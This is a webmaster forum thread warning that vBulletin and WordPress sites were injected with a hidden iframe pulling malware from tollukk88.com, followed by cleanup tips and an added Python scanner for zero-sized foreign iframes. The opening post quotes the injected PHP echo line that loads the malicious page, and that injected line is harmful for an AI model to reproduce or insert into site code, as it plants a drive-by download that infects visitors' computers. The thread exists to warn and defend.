Sites are being Compromised with Malware! (tollukk88.com)

Status
Not open for further replies.

kiran_n444

Ok, so I've noticed a problem with 3 of my sites and a few other sites of friends of mine and whatnot: within the past week they've all had malicious code injected into their sources, which forces users to download malicious software from tollukk88.com. Now I've got no idea how it works, but all I know is that it used an iFrame to link to the site and it downloads the malicious software, which is then installed, and it completely fucks your system.

Last week on the 19th I had to reformat due to the virus completely fucking up my Boot Record and leaving it irreparable, as even Recovery Mode didn't fix it.

Here's what I know so far:

In vBulletin it uses the following code in /includes/AdminFunctions.php:
PHP:
echo "\n <iframe src="http://tollukk88.com/888/index.php" width="0" height="0"></iframe></body>\n</html>";

I've also found the iFrame in many other files in my vB installation. Please note that it's not only targeting vB sites, as one of my WordPress sites has been compromised as well. Please note that all the sites that were infected were on completely different servers.

As a heads up, there can be iFrames to multiple domains, so be thorough!

I'm still trying to figure out what's going on, and this is just a warning to you guys to be careful.

For all the trolls, I checked my permissions; they were all 644 or 755 depending on the file and script.

Google Chrome Blocks the compromised sites (now).

Edit: To Resolve The Issues
This type of attack was faced by me too. This is 100% an issue because of users with infected computers accessing sites by FTP, and this keeps on spreading on servers with infected sites. Here are some tips I followed:

1. Reupload all files on the site
2. Disable any cache system if used by the infected site
3. Search servers for possible hacks
4. Change all FTP / cPanel logins
5. Enable suEXEC on the server
6. chmod source files like templates to read-only by root
7. Ask users to scan their PCs with a good antivirus like KIS
The above can only stop the spread of future infections.

Information Provided by bhanuprasad1981

Edit: I resolved my issues by parsing through the code on my site using Notepad++ to search for strings in all my files and replacing them.

Sincerely,
kiran_n444
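
The string search described in the post, automated so that it does not depend on a single domain name, since the iFrames can point to multiple domains. This is an added example, not part of the original thread; the function names, the file-extension list and the `own_hosts` allowlist are assumptions made for illustration.

```python
import os
import re
from urllib.parse import urlparse

# Opening <iframe ...> tag; in PHP sources it usually sits inside an echo string.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# attr="v", attr='v', attr=\"v\" (escaped inside a PHP string) or unquoted attr=v.
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:\\?["']([^"'\\]*)\\?["']|([^\s>"']+))""")
SCAN_EXT = (".php", ".html", ".htm", ".js", ".tpl", ".inc")  # assumed list, adjust per site


def iframe_attrs(tag):
    """Return the attributes of one iframe tag as a dict with lower-cased keys."""
    return {m.group(1).lower(): (m.group(2) if m.group(2) is not None else m.group(3))
            for m in ATTR_RE.finditer(tag)}


def is_zero(value):
    """True for 0, 0px or 0%: the sizes that make a frame invisible."""
    return value is not None and re.fullmatch(r"0+(px|%)?", value.strip()) is not None


def find_hidden_iframes(text, own_hosts=()):
    """Yield (line_no, host, tag) for zero-sized iframes loading from a foreign host."""
    for m in IFRAME_RE.finditer(text):
        attrs = iframe_attrs(m.group(0))
        host = (urlparse(attrs.get("src", "")).hostname or "").lower()
        if host and host not in own_hosts and is_zero(attrs.get("width")) and is_zero(attrs.get("height")):
            yield text.count("\n", 0, m.start()) + 1, host, m.group(0)


def scan_tree(root, own_hosts=()):
    """Walk a web root and return a sorted list of (path, line_no, host) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXT):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for line_no, host, _tag in find_hidden_iframes(fh.read(), own_hosts):
                        findings.append((path, line_no, host))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    for path, line_no, host in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}:{line_no}: hidden iframe -> {host}")
```

It only matches plain zero-sized iframe tags like the one quoted above; an injection that is encoded or hidden with CSS will not be reported, so a clean result is not proof that the files are clean.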
 
7 comments
2 of my sites are infected, and a bunch more of other sites (not mine). Also, I just made this post as a heads up to the other webmasters.
 
This type of attack was faced by me too. This is 100% an issue because of users with infected computers accessing sites by FTP, and this keeps on spreading on servers with infected sites. Here are some tips I followed:

1. Reupload all files on the site
2. Disable any cache system if used by the infected site
3. Search servers for possible hacks
4. Change all FTP / cPanel logins
5. Enable suEXEC on the server
6. chmod source files like templates to read-only by root
7. Ask users to scan their PCs with a good antivirus like KIS
The above can only stop the spread of future infections.
 
Thanks for the info, bhanuprasad1981. I cleaned all my files out manually by parsing through the code. Also, I added your information to the main post.

-kiran_n444
 